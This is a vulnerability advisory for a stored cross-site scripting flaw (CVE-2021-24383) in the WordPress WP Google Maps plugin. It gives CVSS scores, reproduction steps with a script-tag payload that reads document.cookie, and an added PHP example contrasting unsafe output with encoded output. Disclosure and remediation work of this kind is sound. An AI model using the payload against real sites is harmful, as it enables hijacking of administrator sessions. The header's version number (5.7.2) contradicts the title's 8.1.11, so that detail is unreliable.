WordPress WP Google Maps 8.1.11 Cross Site Scripting

2021.06.25
Credit: Mohammed Adam
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)
# Date: 22/6/2021
# Exploit Author: Mohammed Adam
# Vendor Homepage: https://www.wpgmaps.com/
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: 5.7.2
# Tested on: Windows 10
# CVE: CVE-2021-24383
# References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954

*Proof of Concept*

*Steps to Reproduce:*

1) Edit a map (e.g. /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1)
2) Change Map Name to <script>alert(document.cookie)</script>
3) Save the Map
4) Stored XSS will be triggered when viewing the Map List (/wp-admin/admin.php?page=wp-google-maps-menu)
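The bug class in the steps above is a stored value (the map name) written into the Map List HTML without output encoding. The following is an added example, not code from the plugin or from the original advisory; the function names and the `map_name` field are hypothetical, and plain PHP built-ins stand in for the WordPress helpers `esc_html()` and `sanitize_text_field()` so the script runs outside WordPress.

```php
<?php
// Added illustration; NOT the WP Google Maps plugin's code.
// Function names and the 'map_name' field are hypothetical.

// Unsafe pattern: a stored value is concatenated straight into HTML,
// so any markup saved in the map name is parsed by the admin's browser.
function render_map_row_unsafe(array $map): string
{
    return '<tr><td>' . $map['id'] . '</td><td>' . $map['map_name'] . '</td></tr>';
}

// Hardened pattern: encode at the point of output.
// Inside WordPress, esc_html() is the idiomatic call for this context.
function render_map_row_safe(array $map): string
{
    $id   = (int) $map['id'];   // numeric field: force an integer
    $name = htmlspecialchars(
        (string) $map['map_name'],
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return "<tr><td>{$id}</td><td>{$name}</td></tr>";
}

// Defence in depth at save time: keep only plain text in the name.
// Inside WordPress, sanitize_text_field() plays this role.
function clean_map_name(string $raw): string
{
    $text = strip_tags($raw);
    $text = (string) preg_replace('/[\x00-\x1F\x7F]+/', ' ', $text);
    return trim((string) preg_replace('/\s+/', ' ', $text));
}

// Constructed sample row using the map name from the advisory.
$row = [
    'id'       => '1',
    'map_name' => '<script>alert(document.cookie)</script>',
];

echo "unsafe : ", render_map_row_unsafe($row), "\n";
echo "safe   : ", render_map_row_safe($row), "\n";
echo "stored : ", clean_map_name($row['map_name']), "\n";
```

Output encoding is the control that closes the issue; save-time cleaning only reduces what reaches the database and does not replace encoding in every template that prints the name.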

